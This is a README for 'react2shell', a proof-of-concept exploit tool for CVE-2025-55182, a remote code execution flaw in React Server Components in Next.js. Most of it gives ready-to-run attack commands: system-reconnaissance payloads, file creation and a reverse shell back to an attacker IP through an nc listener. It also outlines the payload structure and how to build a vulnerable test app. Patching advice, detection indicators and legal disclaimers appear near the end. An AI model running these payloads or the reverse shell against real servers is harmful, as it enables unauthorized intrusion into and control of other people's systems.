A proof-of-concept exploit for CVE-2025-55182, a critical Remote Code Execution vulnerability in Next.js applications using React Server Components.
THIS TOOL IS FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING ONLY.
- ❌ DO NOT use against systems you don't own or have explicit permission to test
- ❌ Unauthorized access to computer systems is illegal
- ✅ Only use in controlled environments for learning and authorized penetration testing
- ✅ The author is not responsible for misuse or damage caused by this tool
- CVE ID: CVE-2025-55182
- Vulnerability: Remote Code Execution in React Server Components
- Affected Versions:
- Next.js: ≥14.3.0-canary.77, all 15.x and 16.x versions with App Router
- React: 19.0, 19.1.0, 19.1.1, 19.2.0
- Patched Versions:
- Next.js: 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, 15.0.5
- React: 19.0.1, 19.1.2, 19.2.1
- CVSS Score: Critical
- Attack Vector: Network-based, requires crafted POST request
- ✅ Cross-platform support (Windows & Linux)
- ✅ Multiple payload types
- ✅ Reverse shell capabilities
- ✅ Visual proof payloads (calc, notepad)
- ✅ File system operations
- ✅ System information gathering
# Clone or download this repository
git clone https://github.com/zr0n/react2shell
cd react2shell
# Install dependencies
npm install form-datanode react2shell.js <target_url> <payload_type> [options]| Payload | Description | Example |
|---|---|---|
basic |
Mathematical proof of concept (7*7+1=50) | node react2shell.js http://target:3000 basic |
whoami |
Display current system user | node react2shell.js http://target:3000 whoami |
dir |
List current directory contents | node react2shell.js http://target:3000 dir |
systeminfo |
Display operating system information | node react2shell.js http://target:3000 systeminfo |
file |
Create EXPLOITED.txt proof file | node react2shell.js http://target:3000 file |
calc |
Launch calculator (Windows visual proof) | node react2shell.js http://target:3000 calc |
notepad |
Launch notepad (Windows visual proof) | node react2shell.js http://target:3000 notepad |
shell |
Reverse shell (Windows/Linux auto-detect) | node react2shell.js http://target:3000 shell 10.10.10.5 4444 |
node react2shell.js http://localhost:3000 basic
# Check server console for output: EXPLOITED: 50# Get current user
node react2shell.js http://localhost:3000 whoami
# List files
node react2shell.js http://localhost:3000 dir
# System information
node react2shell.js http://localhost:3000 systeminfo# Launch calculator
node react2shell.js http://localhost:3000 calc
# Launch notepad
node react2shell.js http://localhost:3000 notepadnode react2shell.js http://localhost:3000 file
# Check server directory for EXPLOITED.txt# Terminal 1: Start listener
nc -lvnp 4444
# Terminal 2: Execute exploit
node react2shell.js http://localhost:3000 shell <YOUR_IP> 4444
# Works on both Windows (PowerShell) and Linux (Bash)- Node.js 18+
- npm or yarn
# Create project directory
mkdir vulnerable-nextjs-app
cd vulnerable-nextjs-app
# Initialize Next.js with vulnerable version
npx create-next-app@latest . --ts --app --no-eslint --tailwind
# Downgrade to vulnerable version
npm install next@15.0.4
# Install dependencies
npm installexport default function Home() {
return (
<div className="p-8">
<h1 className="text-4xl font-bold">Vulnerable Next.js App</h1>
<p className="mt-4">This app is vulnerable to CVE-2025-55182</p>
</div>
);
}npm run dev
# Server runs on http://localhost:3000The exploit leverages a deserialization vulnerability in React Server Components:
- Payload Construction: Creates a malicious serialized object with prototype pollution
- Function Constructor Access: Exploits
constructor.constructorto access the Function constructor - Code Injection: Injects arbitrary JavaScript code through the
_prefixfield - Execution: Server deserializes the payload and executes the injected code
// Simplified vulnerability chain
{
_formData: {
get: '$3:constructor:constructor' // Access Function constructor
},
_prefix: 'YOUR_CODE_HERE//' // Injected code
}-
Update Immediately:
npm update next@latest npm update react@latest react-dom@latest
-
Verify Patched Versions:
npm list next react
-
Required Versions:
- Next.js: ≥16.0.7 or ≥15.5.7
- React: ≥19.2.1 or ≥19.1.2
- Scan for vulnerable Next.js versions in your infrastructure
- Implement Web Application Firewall (WAF) rules to detect malicious RSC payloads
- Monitor for suspicious POST requests with
next-actionheaders - Review server-side logs for unexpected code execution patterns
Look for POST requests with:
- Header:
next-action - Content-Type:
multipart/form-data - Body containing:
constructor,_prefix,_formData
POST / with next-action header
Suspicious FormData keys: 0, 1, 2, 3, 4
Response: 200 (successful exploitation) or 500 (failed)
This is an educational tool. Contributions that improve:
- Detection capabilities
- Documentation
- Defensive strategies
- Educational content
are welcome. DO NOT submit contributions that enhance attack capabilities.
Educational Use Only - No warranty provided
Luiz Fernando Ziron Created for cybersecurity education and awareness purposes.
By using this tool, you agree to:
- Only use it on systems you own or have explicit written permission to test
- Take full responsibility for your actions
- Not hold the author liable for any misuse or damage
- Comply with all applicable laws and regulations
Unauthorized access to computer systems is a crime in most jurisdictions.
Stay safe, stay ethical, stay legal. 🔒